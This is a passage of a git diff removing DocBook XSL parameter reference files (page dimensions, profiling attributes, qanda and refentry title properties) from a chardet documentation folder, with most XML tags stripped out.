- - - - 1.25in - 1in - - - - -Description - -The inner page margin is the distance from binding edge of the -page to the first column of text. In the left-to-right, top-to-bottom writing -direction, this is the left margin of recto pages. -The inner and outer margins are usually the same unless the output -is double-sided. - - - - diff --git a/chardet/docs/docbook/xsl/params/page.margin.outer.xml b/chardet/docs/docbook/xsl/params/page.margin.outer.xml deleted file mode 100644 index d66e11a..0000000 --- a/chardet/docs/docbook/xsl/params/page.margin.outer.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -page.margin.outer - - - -page.margin.outer -The outer page margin - - - - - - 0.75in - 1in - - - - -Description - -The outer page margin is the distance from non-binding edge of the -page to the last column of text. In the left-to-right, top-to-bottom writing -direction, this is the right margin of recto pages. -The inner and outer margins are usually the same unless the output -is double-sided. - - - - diff --git a/chardet/docs/docbook/xsl/params/page.margin.top.xml b/chardet/docs/docbook/xsl/params/page.margin.top.xml deleted file mode 100644 index 5c98bb5..0000000 --- a/chardet/docs/docbook/xsl/params/page.margin.top.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -page.margin.top - - - -page.margin.top -The top margin of the page - - - - - - - - -Description - -The top page margin is the distance from the physical top of the -page to the top of the region-before. - - - diff --git a/chardet/docs/docbook/xsl/params/page.orientation.xml b/chardet/docs/docbook/xsl/params/page.orientation.xml deleted file mode 100644 index 22871ff..0000000 --- a/chardet/docs/docbook/xsl/params/page.orientation.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -page.orientation - - - -page.orientation -Select the page orientation - - - - - - -Description - -In portrait orientation, the short edge is horizontal; in -landscape orientation, it is vertical. - - - - diff --git a/chardet/docs/docbook/xsl/params/page.width.portrait.xml b/chardet/docs/docbook/xsl/params/page.width.portrait.xml deleted file mode 100644 index a00584e..0000000 --- a/chardet/docs/docbook/xsl/params/page.width.portrait.xml +++ /dev/null @@ -1,62 +0,0 @@ - - -page.width.portrait - - - -page.width.portrait -Specify the physical size of the short edge of the page - - - - - - 8.5in - 1682mm - 1189mm - 841mm - 594mm - 420mm - 297mm - 210mm - 148mm - 105mm - 74mm - 52mm - 37mm - 26mm - 1000mm - 707mm - 500mm - 353mm - 250mm - 176mm - 125mm - 88mm - 62mm - 44mm - 31mm - 917mm - 648mm - 458mm - 324mm - 229mm - 162mm - 114mm - 81mm - 57mm - 40mm - 28mm - 8.5in - - - - -Description - -The portrait page width is the length of the short -edge of the physical page. - - - - diff --git a/chardet/docs/docbook/xsl/params/page.width.xml b/chardet/docs/docbook/xsl/params/page.width.xml deleted file mode 100644 index 8c3f7b8..0000000 --- a/chardet/docs/docbook/xsl/params/page.width.xml +++ /dev/null @@ -1,31 +0,0 @@ - - -page.width - - - -page.width -The width of the physical page - - - - - - - - - - - - - - - -Description - -The page width is generally calculated from the -paper.type and page.orientation. - - - - diff --git a/chardet/docs/docbook/xsl/params/paper.type.xml b/chardet/docs/docbook/xsl/params/paper.type.xml deleted file mode 100644 index f909251..0000000 --- a/chardet/docs/docbook/xsl/params/paper.type.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -paper.type - - - -paper.type -Select the paper type - - - - - - -Description - -The paper type is a convenient way to specify the paper size. -The list of known paper sizes includes USletter and most of the A, -B, and C sizes. See page.width.portrait, for example. - - - - diff --git a/chardet/docs/docbook/xsl/params/para.propagates.style.xml b/chardet/docs/docbook/xsl/params/para.propagates.style.xml deleted file mode 100644 index 81dbd11..0000000 --- a/chardet/docs/docbook/xsl/params/para.propagates.style.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -para.propagates.style -boolean - - -para.propagates.style -Pass para role attribute through to HTML? - - - - - - - - -Description - -If true, the role attribute of para elements -will be passed through to the HTML as a class attribute on the -p generated for the paragraph. - - - diff --git a/chardet/docs/docbook/xsl/params/part.autolabel.xml b/chardet/docs/docbook/xsl/params/part.autolabel.xml deleted file mode 100644 index a8e0e5c..0000000 --- a/chardet/docs/docbook/xsl/params/part.autolabel.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -part.autolabel -boolean - - -part.autolabel -Are parts and references enumerated? - - - - - - -Description - -If true (non-zero), unlabeled parts and references will be enumerated. - - - - diff --git a/chardet/docs/docbook/xsl/params/passivetex.extensions.xml b/chardet/docs/docbook/xsl/params/passivetex.extensions.xml deleted file mode 100644 index 12178a0..0000000 --- a/chardet/docs/docbook/xsl/params/passivetex.extensions.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -passivetex.extensions -boolean - - -passivetex.extensions -Enable PassiveTeX extensions? - - - - - - -Description - -If non-zero, -PassiveTeX -extensions will be used. At present, this consists of PDF bookmarks -and sorted index terms. - - - - diff --git a/chardet/docs/docbook/xsl/params/phrase.propagates.style.xml b/chardet/docs/docbook/xsl/params/phrase.propagates.style.xml deleted file mode 100644 index ad17380..0000000 --- a/chardet/docs/docbook/xsl/params/phrase.propagates.style.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -phrase.propagates.style -boolean - - -phrase.propagates.style -Pass phrase role attribute through to HTML? - - - - - - -Description - -If true, the role attribute of phrase elements -will be passed through to the HTML as a class attribute on a -span that surrounds the phrase. - - - diff --git a/chardet/docs/docbook/xsl/params/pixels.per.inch.xml b/chardet/docs/docbook/xsl/params/pixels.per.inch.xml deleted file mode 100644 index dbce98a..0000000 --- a/chardet/docs/docbook/xsl/params/pixels.per.inch.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -pixels.per.inch -integer - - -pixels.per.inch -How many pixels are there per inch? - - - - - - - - -Description - -When lengths are converted to pixels, this value is used to -determine the size of a pixel. The default value is taken from the -XSL -Recommendation. - - - - diff --git a/chardet/docs/docbook/xsl/params/points.per.em.xml b/chardet/docs/docbook/xsl/params/points.per.em.xml deleted file mode 100644 index 17d1ac2..0000000 --- a/chardet/docs/docbook/xsl/params/points.per.em.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -points.per.em -number - - -points.per.em -Specify the nominal size of an em-space in points - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/preface.autolabel.xml b/chardet/docs/docbook/xsl/params/preface.autolabel.xml deleted file mode 100644 index 739dcea..0000000 --- a/chardet/docs/docbook/xsl/params/preface.autolabel.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -preface.autolabel -boolean - - -preface.autolabel -Are prefaces enumerated? - - - - - - -Description - -If true (non-zero), unlabeled prefaces will be enumerated. - - - - diff --git a/chardet/docs/docbook/xsl/params/preferred.mediaobject.role.xml b/chardet/docs/docbook/xsl/params/preferred.mediaobject.role.xml deleted file mode 100644 index 7c664c5..0000000 --- a/chardet/docs/docbook/xsl/params/preferred.mediaobject.role.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -preferred.mediaobject.role - - -preferred.mediaobject.role -Select which mediaobject to use based on -this value of an object's role attribute. - - - - - - - - - -Description - -A mediaobject may contain several objects such as imageobjects. -If the parameter use.role.for.mediaobject -is non-zero, then the role attribute on -imageobjects and other objects within a mediaobject container will be used to select which object will be -used. If one of the objects has a role value that matches the -preferred.mediaobject.role parameter, then it has first -priority for selection. If more than one has such a -role value, the first one is used. - - -See the use.role.for.mediaobject parameter -for the sequence of selection. - - diff --git a/chardet/docs/docbook/xsl/params/procedure.properties.xml b/chardet/docs/docbook/xsl/params/procedure.properties.xml deleted file mode 100644 index b8dcbfe..0000000 --- a/chardet/docs/docbook/xsl/params/procedure.properties.xml +++ /dev/null @@ -1,18 +0,0 @@ - - -procedure.properties -Properties associated with a procedure - - - - - - - - -Description - -The styling for procedures. - - - diff --git a/chardet/docs/docbook/xsl/params/process.empty.source.toc.xml b/chardet/docs/docbook/xsl/params/process.empty.source.toc.xml deleted file mode 100644 index 917145a..0000000 --- a/chardet/docs/docbook/xsl/params/process.empty.source.toc.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -process.empty.source.toc -boolean - - -process.empty.source.toc -FIXME: - - - - - - -Description - -FIXME: - - - - diff --git a/chardet/docs/docbook/xsl/params/process.source.toc.xml b/chardet/docs/docbook/xsl/params/process.source.toc.xml deleted file mode 100644 index 0682eb9..0000000 --- a/chardet/docs/docbook/xsl/params/process.source.toc.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -process.source.toc -boolean - - -process.source.toc -FIXME: - - - - - - -Description - -FIXME: - - - - diff --git a/chardet/docs/docbook/xsl/params/profile.arch.xml b/chardet/docs/docbook/xsl/params/profile.arch.xml deleted file mode 100644 index d29cb9c..0000000 --- a/chardet/docs/docbook/xsl/params/profile.arch.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.arch -string - - -profile.arch -Target profile for arch -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.attribute.xml b/chardet/docs/docbook/xsl/params/profile.attribute.xml deleted file mode 100644 index 5653723..0000000 --- a/chardet/docs/docbook/xsl/params/profile.attribute.xml +++ /dev/null @@ -1,29 +0,0 @@ - - -profile.attribute -string - - -profile.attribute -Name of user-specified profiling attribute - - - - - - - - -Description - -This parameter is used in conjuction with profile.value. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.condition.xml b/chardet/docs/docbook/xsl/params/profile.condition.xml deleted file mode 100644 index f8e7753..0000000 --- a/chardet/docs/docbook/xsl/params/profile.condition.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.condition -string - - -profile.condition -Target profile for condition -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.conformance.xml b/chardet/docs/docbook/xsl/params/profile.conformance.xml deleted file mode 100644 index 1b4441e..0000000 --- a/chardet/docs/docbook/xsl/params/profile.conformance.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.conformance -string - - -profile.conformance -Target profile for conformance -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.lang.xml b/chardet/docs/docbook/xsl/params/profile.lang.xml deleted file mode 100644 index 9796138..0000000 --- a/chardet/docs/docbook/xsl/params/profile.lang.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.lang -string - - -profile.lang -Target profile for lang -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.os.xml b/chardet/docs/docbook/xsl/params/profile.os.xml deleted file mode 100644 index 45172a5..0000000 --- a/chardet/docs/docbook/xsl/params/profile.os.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.os -string - - -profile.os -Target profile for os -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.revision.xml b/chardet/docs/docbook/xsl/params/profile.revision.xml deleted file mode 100644 index ea4769d..0000000 --- a/chardet/docs/docbook/xsl/params/profile.revision.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.revision -string - - -profile.revision -Target profile for revision -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.revisionflag.xml b/chardet/docs/docbook/xsl/params/profile.revisionflag.xml deleted file mode 100644 index 5a44373..0000000 --- a/chardet/docs/docbook/xsl/params/profile.revisionflag.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.revisionflag -string - - -profile.revisionflag -Target profile for revisionflag -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.role.xml b/chardet/docs/docbook/xsl/params/profile.role.xml deleted file mode 100644 index 6f22352..0000000 --- a/chardet/docs/docbook/xsl/params/profile.role.xml +++ /dev/null @@ -1,54 +0,0 @@ - - -profile.role -string - - -profile.role -Target profile for role -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - -Note that role is often -used for other purposes than profiling. For example it is commonly -used to get emphasize in bold font: - -very important]]> - -If you are using role for -these purposes do not forget to add values like bold to -value of this parameter. If you forgot you will get document with -small pieces missing which are very hard to track. - -For this reason it is not recommended to use role attribute for profiling. You should -rather use profiling specific attributes like userlevel, os, arch, condition, etc. - - - - diff --git a/chardet/docs/docbook/xsl/params/profile.security.xml b/chardet/docs/docbook/xsl/params/profile.security.xml deleted file mode 100644 index 9353632..0000000 --- a/chardet/docs/docbook/xsl/params/profile.security.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.security -string - - -profile.security -Target profile for security -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.separator.xml b/chardet/docs/docbook/xsl/params/profile.separator.xml deleted file mode 100644 index f48fd02..0000000 --- a/chardet/docs/docbook/xsl/params/profile.separator.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -profile.separator -string - - -profile.separator -Separator character for compound profile values - - - - - - - - -Description - -Separator character for compound profile values. - - - diff --git a/chardet/docs/docbook/xsl/params/profile.userlevel.xml b/chardet/docs/docbook/xsl/params/profile.userlevel.xml deleted file mode 100644 index d2aeae0..0000000 --- a/chardet/docs/docbook/xsl/params/profile.userlevel.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.userlevel -string - - -profile.userlevel -Target profile for userlevel -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.value.xml b/chardet/docs/docbook/xsl/params/profile.value.xml deleted file mode 100644 index c22c5c9..0000000 --- a/chardet/docs/docbook/xsl/params/profile.value.xml +++ /dev/null @@ -1,36 +0,0 @@ - - -profile.value -string - - -profile.value -Target profile for user-specified attribute - - - - - - - - -Description - -When you are using this parameter you must also specify name of -profiling attribute with parameter profile.attribute. - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/profile.vendor.xml b/chardet/docs/docbook/xsl/params/profile.vendor.xml deleted file mode 100644 index 06800d8..0000000 --- a/chardet/docs/docbook/xsl/params/profile.vendor.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -profile.vendor -string - - -profile.vendor -Target profile for vendor -attribute - - - - - - - - -Description - -Value of this parameter specifies profiles which should be -included in the output. You can specify multiple profiles by -separating them by semicolon. You can change separator character by -profile.separator -parameter. - -This parameter has effect only when you are using profiling -stylesheets (profile-docbook.xsl, -profile-chunk.xsl, …) instead of normal -ones (docbook.xsl, -chunk.xsl, …). - - - diff --git a/chardet/docs/docbook/xsl/params/punct.honorific.xml b/chardet/docs/docbook/xsl/params/punct.honorific.xml deleted file mode 100644 index c34143c..0000000 --- a/chardet/docs/docbook/xsl/params/punct.honorific.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -punct.honorific -string - - -punct.honorific -Punctuation after an honorific in a personal name. - - - - - - - - -Description - -This parameter specifies the punctuation that should be added after an -honorific in a personal name. - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.defaultlabel.xml b/chardet/docs/docbook/xsl/params/qanda.defaultlabel.xml deleted file mode 100644 index 58b0f8a..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.defaultlabel.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -qanda.defaultlabel -boolean - - -qanda.defaultlabel -Sets the default for defaultlabel on QandASet. - - - -number - - -Description - -If no defaultlabel attribute is specified on a QandASet, this -value is used. It must be one of the legal values for the defaultlabel -attribute. - - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.inherit.numeration.xml b/chardet/docs/docbook/xsl/params/qanda.inherit.numeration.xml deleted file mode 100644 index 9005355..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.inherit.numeration.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -qanda.inherit.numeration -boolean - - -qanda.inherit.numeration -Does enumeration of QandASet components inherit the numeration of parent elements? - - - - - - -Description - -If true (non-zero), numbered QandADiv elements and Questions and Answers inherit -the numeration of the ancestors of the QandASet. - - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.title.level1.properties.xml b/chardet/docs/docbook/xsl/params/qanda.title.level1.properties.xml deleted file mode 100644 index 600687a..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.title.level1.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -qanda.title.level1.properties -attribute set - - -qanda.title.level1.properties -Properties for level-1 qanda set titles - - - - - - - - pt - - - - - -Description - -The properties of level-1 qanda set titles. - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.title.level2.properties.xml b/chardet/docs/docbook/xsl/params/qanda.title.level2.properties.xml deleted file mode 100644 index d6800bc..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.title.level2.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -qanda.title.level2.properties -attribute set - - -qanda.title.level2.properties -Properties for level-2 qanda set titles - - - - - - - - pt - - - - - -Description - -The properties of level-2 qanda set titles. - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.title.level3.properties.xml b/chardet/docs/docbook/xsl/params/qanda.title.level3.properties.xml deleted file mode 100644 index ef79344..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.title.level3.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -qanda.title.level3.properties -attribute set - - -qanda.title.level3.properties -Properties for level-3 qanda set titles - - - - - - - - pt - - - - - -Description - -The properties of level-3 qanda set titles. - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.title.level4.properties.xml b/chardet/docs/docbook/xsl/params/qanda.title.level4.properties.xml deleted file mode 100644 index 599edf7..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.title.level4.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -qanda.title.level4.properties -attribute set - - -qanda.title.level4.properties -Properties for level-4 qanda set titles - - - - - - - - pt - - - - - -Description - -The properties of level-4 qanda set titles. - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.title.level5.properties.xml b/chardet/docs/docbook/xsl/params/qanda.title.level5.properties.xml deleted file mode 100644 index 560ef31..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.title.level5.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -qanda.title.level5.properties -attribute set - - -qanda.title.level5.properties -Properties for level-5 qanda set titles - - - - - - - - pt - - - - - -Description - -The properties of level-5 qanda set titles. - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.title.level6.properties.xml b/chardet/docs/docbook/xsl/params/qanda.title.level6.properties.xml deleted file mode 100644 index 6864172..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.title.level6.properties.xml +++ /dev/null @@ -1,29 +0,0 @@ - - -qanda.title.level6.properties -attribute set - - -qanda.title.level6.properties -Properties for level-6 qanda set titles - - - - - - - - pt - - - - - -Description - -The properties of level-6 qanda set titles. -This property set is actually -used for all titles below level 5. - - - diff --git a/chardet/docs/docbook/xsl/params/qanda.title.properties.xml b/chardet/docs/docbook/xsl/params/qanda.title.properties.xml deleted file mode 100644 index a7dfcd3..0000000 --- a/chardet/docs/docbook/xsl/params/qanda.title.properties.xml +++ /dev/null @@ -1,32 +0,0 @@ - - -qanda.title.properties -attribute set - - -qanda.title.properties -Properties for qanda set titles - - - - - - - - - bold - - always - 0.8em - 1.0em - 1.2em - - - - -Description - -The properties common to all qanda set titles. - - - diff --git a/chardet/docs/docbook/xsl/params/qandadiv.autolabel.xml b/chardet/docs/docbook/xsl/params/qandadiv.autolabel.xml deleted file mode 100644 index a3a62c4..0000000 --- a/chardet/docs/docbook/xsl/params/qandadiv.autolabel.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -qandadiv.autolabel -boolean - - -qandadiv.autolabel -Are divisions in QAndASets enumerated? - - - - - - -Description - -If true (non-zero), unlabeled qandadivs will be enumerated. - - - - diff --git a/chardet/docs/docbook/xsl/params/refentry.generate.name.xml b/chardet/docs/docbook/xsl/params/refentry.generate.name.xml deleted file mode 100644 index f2b714f..0000000 --- a/chardet/docs/docbook/xsl/params/refentry.generate.name.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -refentry.generate.name -boolean - - -refentry.generate.name -Output NAME header before 'RefName'(s)? - - - - - - -Description - -If true (non-zero), a "NAME" section title is output before the list -of 'RefName's. This parameter and -refentry.generate.title are mutually -exclusive. This means that if you change this parameter to zero, you -should set refentry.generate.title to 1 unless -you want get quite strange output. - - - - diff --git a/chardet/docs/docbook/xsl/params/refentry.generate.title.xml b/chardet/docs/docbook/xsl/params/refentry.generate.title.xml deleted file mode 100644 index 6c39362..0000000 --- a/chardet/docs/docbook/xsl/params/refentry.generate.title.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -refentry.generate.title -boolean - - -refentry.generate.title -Output title before 'RefName'(s)? - - - - - - - - -Description - -If true (non-zero), the reference page title or first name is -output before the list of 'RefName's. This parameter and -refentry.generate.name are mutually exclusive. -This means that if you change this parameter to 1, you -should set refentry.generate.name to 0 unless -you want get quite strange output. - - - - diff --git a/chardet/docs/docbook/xsl/params/refentry.pagebreak.xml b/chardet/docs/docbook/xsl/params/refentry.pagebreak.xml deleted file mode 100644 index 51d3052..0000000 --- a/chardet/docs/docbook/xsl/params/refentry.pagebreak.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -refentry.pagebreak -boolean - - -refentry.pagebreak -Start each refentry on a new page - - - - - - -Description - -If non-zero (the default), each refentry -element will start on a new page. If zero, a page -break will not be generated. - - - - diff --git a/chardet/docs/docbook/xsl/params/refentry.separator.xml b/chardet/docs/docbook/xsl/params/refentry.separator.xml deleted file mode 100644 index 26d0ef0..0000000 --- a/chardet/docs/docbook/xsl/params/refentry.separator.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -refentry.separator -boolean - - -refentry.separator -Generate a separator between consecutive RefEntry elements? - - - - - - -Description - -If true, a separator will be generated between consecutive -reference pages. - - - - diff --git a/chardet/docs/docbook/xsl/params/refentry.title.properties.xml b/chardet/docs/docbook/xsl/params/refentry.title.properties.xml deleted file mode 100644 index 2ae97e0..0000000 --- a/chardet/docs/docbook/xsl/params/refentry.title.properties.xml +++ /dev/null @@ -1,43 +0,0 @@ - - -refentry.title.properties -attribute set - - -refentry.title.properties -Title properties for a refentry title - - - - - - - - - 18pt - bold - 1em - false - always - 0.8em - 1.0em - 1.2em - 0.5em - 0.4em - 0.6em - - - - -Description - -Formatting properties applied to refentry titles, -including refnamediv, refsect1 through 3, and refsection. -The font size is supplied by the appropriate -section.levelX.title.properties -attribute-set, -computed from its location in the section hierarchy. - - - - diff --git a/chardet/docs/docbook/xsl/params/refentry.xref.manvolnum.xml b/chardet/docs/docbook/xsl/params/refentry.xref.manvolnum.xml deleted file mode 100644 index d790793..0000000 --- a/chardet/docs/docbook/xsl/params/refentry.xref.manvolnum.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -refentry.xref.manvolnum -boolean - - -refentry.xref.manvolnum -Output manvolnum as part of -refentry cross-reference? - - - - - - -Description - -if true (non-zero), the manvolnum is used when cross-referencing -refentrys, either with xref -or citerefentry. - - - - diff --git a/chardet/docs/docbook/xsl/params/region.after.extent.xml b/chardet/docs/docbook/xsl/params/region.after.extent.xml deleted file mode 100644 index 3ddf3ec..0000000 --- a/chardet/docs/docbook/xsl/params/region.after.extent.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -region.after.extent - - - -region.after.extent -Specifies the height of the footer. - - - - - - - - -Description - -The region after extent is the height of the area where footers -are printed. - - - - diff --git a/chardet/docs/docbook/xsl/params/region.before.extent.xml b/chardet/docs/docbook/xsl/params/region.before.extent.xml deleted file mode 100644 index 2a1a279..0000000 --- a/chardet/docs/docbook/xsl/params/region.before.extent.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -region.before.extent - - - -region.before.extent -Specifies the height of the header - - - - - - - - -Description - -The region before extent is the height of the area where headers -are printed. - - - - diff --git a/chardet/docs/docbook/xsl/params/root.filename.xml b/chardet/docs/docbook/xsl/params/root.filename.xml deleted file mode 100644 index c62670f..0000000 --- a/chardet/docs/docbook/xsl/params/root.filename.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -root.filename - - - -root.filename -Identifies the name of the root HTML file when chunking - - - - - - -Description - -The root.filename is the base filename for -the chunk created for the root of each document processed. - - - - diff --git a/chardet/docs/docbook/xsl/params/root.properties.xml b/chardet/docs/docbook/xsl/params/root.properties.xml deleted file mode 100644 index 6424412..0000000 --- a/chardet/docs/docbook/xsl/params/root.properties.xml +++ /dev/null @@ -1,38 +0,0 @@ - - -root.properties -attribute set - - -root.properties -The properties of the fo:root element - - - - - - - - - - - - - - - - - - character-by-character - disregard-shifts - - - - -Description - -This property set is used on the fo:root element of -an FO file. It defines a set of default, global parameters. - - - diff --git a/chardet/docs/docbook/xsl/params/rootid.xml b/chardet/docs/docbook/xsl/params/rootid.xml deleted file mode 100644 index 49108ff..0000000 --- a/chardet/docs/docbook/xsl/params/rootid.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -rootid -string - - -rootid -Specify the root element to format - - - - - - -Description - -If rootid is specified, it must be the -value of an ID that occurs in the document being formatted. The entire -document will be loaded and parsed, but formatting will begin at the -element identified, rather than at the root. For example, this allows -you to process only chapter 4 of a book. -Because the entire document is available to the processor, automatic -numbering, cross references, and other dependencies are correctly -resolved. - - - diff --git a/chardet/docs/docbook/xsl/params/runinhead.default.title.end.punct.xml b/chardet/docs/docbook/xsl/params/runinhead.default.title.end.punct.xml deleted file mode 100644 index 0fe7343..0000000 --- a/chardet/docs/docbook/xsl/params/runinhead.default.title.end.punct.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -runinhead.default.title.end.punct -string - - -runinhead.default.title.end.punct -Default punctuation character on a run-in-head - - - - - - -Description - -FIXME: - - - - diff --git a/chardet/docs/docbook/xsl/params/runinhead.title.end.punct.xml b/chardet/docs/docbook/xsl/params/runinhead.title.end.punct.xml deleted file mode 100644 index a82487b..0000000 --- a/chardet/docs/docbook/xsl/params/runinhead.title.end.punct.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -runinhead.title.end.punct -string - - -runinhead.title.end.punct -Characters that count as punctuation on a run-in-head - - - - - - -Description - -FIXME: - - - - diff --git a/chardet/docs/docbook/xsl/params/sans.font.family.xml b/chardet/docs/docbook/xsl/params/sans.font.family.xml deleted file mode 100644 index c07ad4c..0000000 --- a/chardet/docs/docbook/xsl/params/sans.font.family.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -sans.font.family - - - -sans.font.family -The default sans-serif font family - - - - - - - - -Description - -The default sans-serif font family. At the present, this isn't -actually used by the stylesheets. - - - - diff --git a/chardet/docs/docbook/xsl/params/saxon.callouts.xml b/chardet/docs/docbook/xsl/params/saxon.callouts.xml deleted file mode 100644 index 362c3b7..0000000 --- a/chardet/docs/docbook/xsl/params/saxon.callouts.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -saxon.callouts -boolean - - -saxon.callouts -Enable the callout extension - - - - - - -Description - -The callouts extension processes areaset -elements in ProgramListingCO and other text-based -callout elements. - - - - diff --git a/chardet/docs/docbook/xsl/params/saxon.character.representation.xml b/chardet/docs/docbook/xsl/params/saxon.character.representation.xml deleted file 